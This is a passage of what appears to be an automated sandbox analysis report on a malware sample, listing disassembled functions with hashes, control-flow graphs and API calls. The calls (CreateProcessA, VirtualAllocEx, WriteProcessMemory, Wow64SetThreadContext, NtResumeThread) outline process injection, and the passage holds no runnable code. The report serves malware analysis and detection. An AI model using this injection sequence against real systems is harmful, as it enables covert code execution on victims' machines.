                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • NtResumeThread.NTDLL(?,?), ref: 053E59EE
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1472796257.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_53e0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ResumeThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 947044025-0
                                                                                                                                                                                            • Opcode ID: 4c1c10316e41a05198dfe9c27267e52db8773c538e04e7abf43f476dbfedba3e
                                                                                                                                                                                            • Instruction ID: 33f9aea7c01dc0bc15c99cf9794ea55ef22b13980e4c12e2e19ce700931b4656
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c1c10316e41a05198dfe9c27267e52db8773c538e04e7abf43f476dbfedba3e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B31C9B5D012189FDB14CFAAD880AEEFBF5BB48310F10942AE805B7300C739A905CFA4
                                                                                                                                                                                            Function 053E3AB0 Relevance: .3, Instructions: 306COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1472796257.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_53e0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ea0dc9cf79366a782bde7dddd0494b202cc8143c199aa28983ea7164645eebb5
                                                                                                                                                                                            • Instruction ID: 9733f1781f2dd7345b70ace903cde4f5c809f0f5e0d381f64f0baaf6bfb8566d
                                                                                                                                                                                            • Opcode Fuzzy Hash: ea0dc9cf79366a782bde7dddd0494b202cc8143c199aa28983ea7164645eebb5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 73D13970E05228CFDB54DFA9D845BADBBF6FB89300F1084A9D40AAB285DB746D85CF11
                                                                                                                                                                                            Function 053E3AA1 Relevance: .3, Instructions: 284COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1472796257.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_53e0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: cab758ea54a740bd54d874ced8e7ff92c7614668d10a45fae62342a8ae25f25e
                                                                                                                                                                                            • Instruction ID: c593745dbef74e6bd943c23fa7096c7c21b5ac08f2c586534e147c0260de8a42
                                                                                                                                                                                            • Opcode Fuzzy Hash: cab758ea54a740bd54d874ced8e7ff92c7614668d10a45fae62342a8ae25f25e
                                                                                                                                                                                            • Instruction Fuzzy Hash: EAC14970E05228CFDB54DFA9D845BADBBF6BB89300F1084A9D40ABB285DB746D85CF11
                                                                                                                                                                                            Function 0661F718 Relevance: .3, Instructions: 276COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1477410597.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6600000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 7a45e05c72ac5c42e99e6257c3bea2cd318e7477e28f2093c59beeaee866c733
                                                                                                                                                                                            • Instruction ID: fa2b50ae58f85c863780fde3c1114089b57082ea1b8a931a4138b84f34fee693
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a45e05c72ac5c42e99e6257c3bea2cd318e7477e28f2093c59beeaee866c733
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FD1C074E00218CFDB54DFA9D994B9DBBF2BF89300F1485A9D409AB369DB31A981CF50
                                                                                                                                                                                            Function 0661F420 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1477410597.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_6600000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 74dce5bffdbdaed94aef73702b30164304d8477f6114503d29d6d7c5c24aa980
                                                                                                                                                                                            • Instruction ID: 3e4fe1a4226ab23f6e7a0d9717b664e958e938a9c14e775fb164b37d1b92b791
                                                                                                                                                                                            • Opcode Fuzzy Hash: 74dce5bffdbdaed94aef73702b30164304d8477f6114503d29d6d7c5c24aa980
                                                                                                                                                                                            • Instruction Fuzzy Hash: C1510974E05209CFDB44DFA9D5856AEBBF2FF88300F189129E509AB355D7349942CF90
                                                                                                                                                                                            Function 048B1ED8 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 66 48b1ed8-48b1f0d 68 48b1f18-48b1f1d 66->68 69 48b1f0f-48b1f16 66->69 71 48b20c2-48b20cc 68->71 69->68 70 48b1f22-48b1fa8 call 48b11b0 call 48b11c0 69->70 84 48b1fae-48b1fce call 48b11d0 70->84 89 48b1fff-48b2023 84->89 90 48b1fd0-48b1ffd 84->90 93 48b202a-48b202e 89->93 90->93 95 48b2039 93->95 96 48b2030 93->96 95->71 96->95
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1471614559.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_48b0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Hq$Teq
                                                                                                                                                                                            • API String ID: 0-940622457
                                                                                                                                                                                            • Opcode ID: a9c660a97bc9ff993f33a02c41698002d27651ee27d464594c46baae9814a678
                                                                                                                                                                                            • Instruction ID: 417acb21f126cbbe3ccc5a72daf01d89aa31d971a5862dc51ec8cb2f66fc04b8
                                                                                                                                                                                            • Opcode Fuzzy Hash: a9c660a97bc9ff993f33a02c41698002d27651ee27d464594c46baae9814a678
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A417034B001049FD714EF79D498AAEBBF6EF88350F248569E805EB365DB71AC01CB91
                                                                                                                                                                                            Function 048B0C68 Relevance: 2.6, Strings: 2, Instructions: 111COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 98 48b0c68-48b0c8e 100 48b0cb2-48b0cd6 98->100 101 48b0c90-48b0c99 98->101 105 48b0cdd-48b0d54 100->105 104 48b0c9b-48b0caf 101->104 101->105 115 48b0d56-48b0d59 call 48b0df9 105->115 116 48b0d75-48b0d87 105->116 117 48b0d5f-48b0d73 115->117 120 48b0d89-48b0da5 116->120 121 48b0dbc-48b0de7 116->121 117->115 117->116 124 48b0da7-48b0daa 120->124 125 48b0db5-48b0dba 120->125 127 48b0dee-48b0df5 121->127 131 48b0daf call 48b1e70 124->131 132 48b0daf call 48b1e44 124->132 125->127 131->125 132->125
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1471614559.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_48b0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Hq$Hq
                                                                                                                                                                                            • API String ID: 0-925789375
                                                                                                                                                                                            • Opcode ID: 996644095a9e61b8afab89c272617dc2f18feb1aff984814d823a763c646e8a0
                                                                                                                                                                                            • Instruction ID: a0391ec2f6209f3664e9fa1c3dae53a9ad094caec6d8c0c7dba6c235cf987e15
                                                                                                                                                                                            • Opcode Fuzzy Hash: 996644095a9e61b8afab89c272617dc2f18feb1aff984814d823a763c646e8a0
                                                                                                                                                                                            • Instruction Fuzzy Hash: C841C330A043544FCB15DF74A8517EE7FB1AF86300F18456AD985DB396DA38AD05CBA1
                                                                                                                                                                                            Function 053E326A Relevance: 1.8, APIs: 1, Instructions: 262processCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 263 53e326a-53e3302 266 53e334b-53e3373 263->266 267 53e3304-53e331b 263->267 271 53e33b9-53e340f 266->271 272 53e3375-53e3389 266->272 267->266 270 53e331d-53e3322 267->270 273 53e3324-53e332e 270->273 274 53e3345-53e3348 270->274 280 53e3455-53e34ea CreateProcessA 271->280 281 53e3411-53e3425 271->281 272->271 282 53e338b-53e3390 272->282 275 53e3332-53e3341 273->275 276 53e3330 273->276 274->266 275->275 279 53e3343 275->279 276->275 279->274 294 53e34ec-53e34f2 280->294 295 53e34f3-53e3569 280->295 281->280 290 53e3427-53e342c 281->290 283 53e3392-53e339c 282->283 284 53e33b3-53e33b6 282->284 285 53e339e 283->285 286 53e33a0-53e33af 283->286 284->271 285->286 286->286 289 53e33b1 286->289 289->284 292 53e342e-53e3438 290->292 293 53e344f-53e3452 290->293 296 53e343c-53e344b 292->296 297 53e343a 292->297 293->280 294->295 303 53e356b-53e356f 295->303 304 53e3579-53e357d 295->304 296->296 298 53e344d 296->298 297->296 298->293 303->304 305 53e3571 303->305 306 53e357f-53e3583 304->306 307 53e358d-53e3591 304->307 305->304 306->307 308 53e3585 306->308 309 53e3593-53e3597 307->309 310 53e35a1 307->310 308->307 309->310 311 53e3599 309->311 312 53e35a2 310->312 311->310 312->312
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 053E34D7
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1472796257.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_53e0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                                                            • Opcode ID: 9fa0e80bcaf2da76d6444c623d8447c16136dddf423b184212d5b446e63bbe6b
                                                                                                                                                                                            • Instruction ID: 8c3cb962a6af8fdebc916a4e51bd5e4c6a53ea2a3a1ac22edacbd4258d8c29a7
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fa0e80bcaf2da76d6444c623d8447c16136dddf423b184212d5b446e63bbe6b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 02A1F2B0D043289FDB10CFA9C885BEDBBF1BF49300F149569E859A7280DB74A985CF55
                                                                                                                                                                                            Function 053E3270 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 313 53e3270-53e3302 315 53e334b-53e3373 313->315 316 53e3304-53e331b 313->316 320 53e33b9-53e340f 315->320 321 53e3375-53e3389 315->321 316->315 319 53e331d-53e3322 316->319 322 53e3324-53e332e 319->322 323 53e3345-53e3348 319->323 329 53e3455-53e34ea CreateProcessA 320->329 330 53e3411-53e3425 320->330 321->320 331 53e338b-53e3390 321->331 324 53e3332-53e3341 322->324 325 53e3330 322->325 323->315 324->324 328 53e3343 324->328 325->324 328->323 343 53e34ec-53e34f2 329->343 344 53e34f3-53e3569 329->344 330->329 339 53e3427-53e342c 330->339 332 53e3392-53e339c 331->332 333 53e33b3-53e33b6 331->333 334 53e339e 332->334 335 53e33a0-53e33af 332->335 333->320 334->335 335->335 338 53e33b1 335->338 338->333 341 53e342e-53e3438 339->341 342 53e344f-53e3452 339->342 345 53e343c-53e344b 341->345 346 53e343a 341->346 342->329 343->344 352 53e356b-53e356f 344->352 353 53e3579-53e357d 344->353 345->345 347 53e344d 345->347 346->345 347->342 352->353 354 53e3571 352->354 355 53e357f-53e3583 353->355 356 53e358d-53e3591 353->356 354->353 355->356 357 53e3585 355->357 358 53e3593-53e3597 356->358 359 53e35a1 356->359 357->356 358->359 360 53e3599 358->360 361 53e35a2 359->361 360->359 361->361
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 053E34D7
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1472796257.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_53e0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                                                            • Opcode ID: 13b038de219d9bc502c29b3ed8b4e3fffae26fe5bffe9450215c9f6814bba713
                                                                                                                                                                                            • Instruction ID: 1426735e488f472d19f92f93065f067e54df98841e8459b6e07cd04f5bfff9d3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 13b038de219d9bc502c29b3ed8b4e3fffae26fe5bffe9450215c9f6814bba713
                                                                                                                                                                                            • Instruction Fuzzy Hash: 85A1F2B0D043289FDB10CFA9C885BEDBBF1BF49300F149569E859A7280DB74A985CF55
                                                                                                                                                                                            Function 053E52D8 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 362 53e52d8-53e534b 365 53e534d-53e535f 362->365 366 53e5362-53e53c3 WriteProcessMemory 362->366 365->366 368 53e53cc-53e541e 366->368 369 53e53c5-53e53cb 366->369 369->368
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 053E53B3
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1472796257.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_53e0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                                                            • Opcode ID: 4b84951808cad028f8068933294dff48857a58eeecf37f0280127e5dea776480
                                                                                                                                                                                            • Instruction ID: 5e38fef5981fd7c628e71f12cec9c95835edb182286cc5d62ed569eed953f755
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b84951808cad028f8068933294dff48857a58eeecf37f0280127e5dea776480
                                                                                                                                                                                            • Instruction Fuzzy Hash: C741CAB5D012589FDF00CFA9D984AEEFBF1BB49304F14902AE818B7240D779AA45CF64
                                                                                                                                                                                            Function 053E52E0 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 374 53e52e0-53e534b 376 53e534d-53e535f 374->376 377 53e5362-53e53c3 WriteProcessMemory 374->377 376->377 379 53e53cc-53e541e 377->379 380 53e53c5-53e53cb 377->380 380->379
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 053E53B3
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1472796257.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_53e0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                                                            • Opcode ID: 7dfa086221016838e820ccfff42941b1174962447454e12a9ad2d513f054f047
                                                                                                                                                                                            • Instruction ID: 362813a44c3d50324fd4c986bd45071038b898948100aee942029ee99fb1d5cf
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7dfa086221016838e820ccfff42941b1174962447454e12a9ad2d513f054f047
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E41CBB5D012588FDF00CFA9D984ADEFBF1BB49304F14902AE818B7240D779AA05CF64
                                                                                                                                                                                            Function 053E5008 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 385 53e5008-53e50ca VirtualAllocEx 389 53e50cc-53e50d2 385->389 390 53e50d3-53e511d 385->390 389->390
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 053E50BA
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1472796257.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_53e0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                            • Opcode ID: 64f4610ac5c91415a4371916276e74087bfe2ec09f6a01f1caada6618e387374
                                                                                                                                                                                            • Instruction ID: 9f69656d29134b5855acee2224f9d74ee7331455e426975658f2bc020a60e4e3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 64f4610ac5c91415a4371916276e74087bfe2ec09f6a01f1caada6618e387374
                                                                                                                                                                                            • Instruction Fuzzy Hash: B931B7B9D00258DFCF10CFA9D884ADEFBB1BB49310F10A42AE814B7200D735A901CF68
                                                                                                                                                                                            Function 053E5010 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 395 53e5010-53e50ca VirtualAllocEx 398 53e50cc-53e50d2 395->398 399 53e50d3-53e511d 395->399 398->399
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 053E50BA
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1472796257.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_53e0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                            • Opcode ID: 73e3cf5decf54d578d81fbfc3133145927959c5d0d5c020deb0c00abff7d33e2
                                                                                                                                                                                            • Instruction ID: 92a8efedb327417f38203846f6b3b6cca7d1e47dcafcbc981d898a3c44ff9af6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 73e3cf5decf54d578d81fbfc3133145927959c5d0d5c020deb0c00abff7d33e2
                                                                                                                                                                                            • Instruction Fuzzy Hash: EE3197B9D002589FDF14CFA9D880ADEFBB5BB49310F10A42AE815B7240D735A905CF68
                                                                                                                                                                                            Function 053E4928 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 404 53e4928-53e4990 407 53e49a7-53e49ef Wow64SetThreadContext 404->407 408 53e4992-53e49a4 404->408 410 53e49f8-53e4a44 407->410 411 53e49f1-53e49f7 407->411 408->407 411->410
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 053E49DF
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1472796257.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_53e0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 983334009-0
                                                                                                                                                                                            • Opcode ID: 381e148eb54cb3fc705663e82f8f8fe737e5a517ce596e8946b88327590a4897
                                                                                                                                                                                            • Instruction ID: 9268c99690513fd42196f6066b9b1bba642baf5bb0e9bbcaf732e28ea8e4d1e0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 381e148eb54cb3fc705663e82f8f8fe737e5a517ce596e8946b88327590a4897
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3341CBB5D002589FDF14CFAAD885AEEFBF1BB48314F14802AE815B7240D738A945CF54
                                                                                                                                                                                            Function 053E4930 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 053E49DF
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1472796257.00000000053E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_53e0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 983334009-0
                                                                                                                                                                                            • Opcode ID: 24f8465643f0aa255aa3303b89dcd9f682ef91b5edd2360ab5dd80b4d9a54b2b
                                                                                                                                                                                            • Instruction ID: f9ca6c19da29df30dd9ff520555b42a38190a5755602896841b0876ba883e218
                                                                                                                                                                                            • Opcode Fuzzy Hash: 24f8465643f0aa255aa3303b89dcd9f682ef91b5edd2360ab5dd80b4d9a54b2b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9831BAB5D102589FDF14CFAAD885AEEFBF1BB48310F14802AE819B7240D779A945CF64
                                                                                                                                                                                            Function 048B0881 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1471614559.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_48b0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: q
                                                                                                                                                                                            • API String ID: 0-1543536600
                                                                                                                                                                                            • Opcode ID: 2e4d2d3bebd168c6ac581ddd278fcc86d177a4dd0c1c10b85af67282de2ddf5c
                                                                                                                                                                                            • Instruction ID: a7681bbc3b00dc4b0719dc0f097be4ae49d2e9bfb6f78dbf3a51d8ec039b7814
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e4d2d3bebd168c6ac581ddd278fcc86d177a4dd0c1c10b85af67282de2ddf5c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 35519030E003588FCB15DFB4985069E7BF2EF86300F15896DD441EF399DB78A94A8B95
                                                                                                                                                                                            Function 048B08A8 Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1471614559.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_48b0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: q
                                                                                                                                                                                            • API String ID: 0-1543536600
                                                                                                                                                                                            • Opcode ID: c68673e23427a31b7f3b3c3c077dfc764fbdf72a3c21d0572ae520d3c6611514
                                                                                                                                                                                            • Instruction ID: 848467ac14c8e22c334f177e64b12d9cef8528f355f61319bd5b5cb69b75cd52
                                                                                                                                                                                            • Opcode Fuzzy Hash: c68673e23427a31b7f3b3c3c077dfc764fbdf72a3c21d0572ae520d3c6611514
                                                                                                                                                                                            • Instruction Fuzzy Hash: FF415C30E003199BDB15EFA5D4507AE7BF2EF89300F108929E451FB348EB75A9468B95
                                                                                                                                                                                            Function 048B20E8 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1471614559.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_48b0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Hq
                                                                                                                                                                                            • API String ID: 0-1594803414
                                                                                                                                                                                            • Opcode ID: b024ea24a28df66ac9b7791645b3937499517b16c1acf758b15484c44b8f5a42
                                                                                                                                                                                            • Instruction ID: f8abb23872add73ff9bcab7ffd03620c178a9f4f17e810ab16ca3c6a4451bea7
                                                                                                                                                                                            • Opcode Fuzzy Hash: b024ea24a28df66ac9b7791645b3937499517b16c1acf758b15484c44b8f5a42
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1331E5317052106FD319CA69985096ABBE6EFC932032989BEDA48CB741CE35FC03C7D4
                                                                                                                                                                                            Function 048B0D20 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1471614559.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_48b0000_nEnq-0023HHHDDJKSS1000025.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Hq
                                                                                                                                                                                            • API String ID: 0-1594803414
                                                                                                                                                                                            • Opcode ID: a4de89e5a144b31a4dd180934f7575f0c4c7f6d594d96384cb137874717e35d7
                                                                                                                                                                                            • Instruction ID: 87bd15008a85f9418d68106aa5958af4de7e07b968a18deedd2bdb9710405204
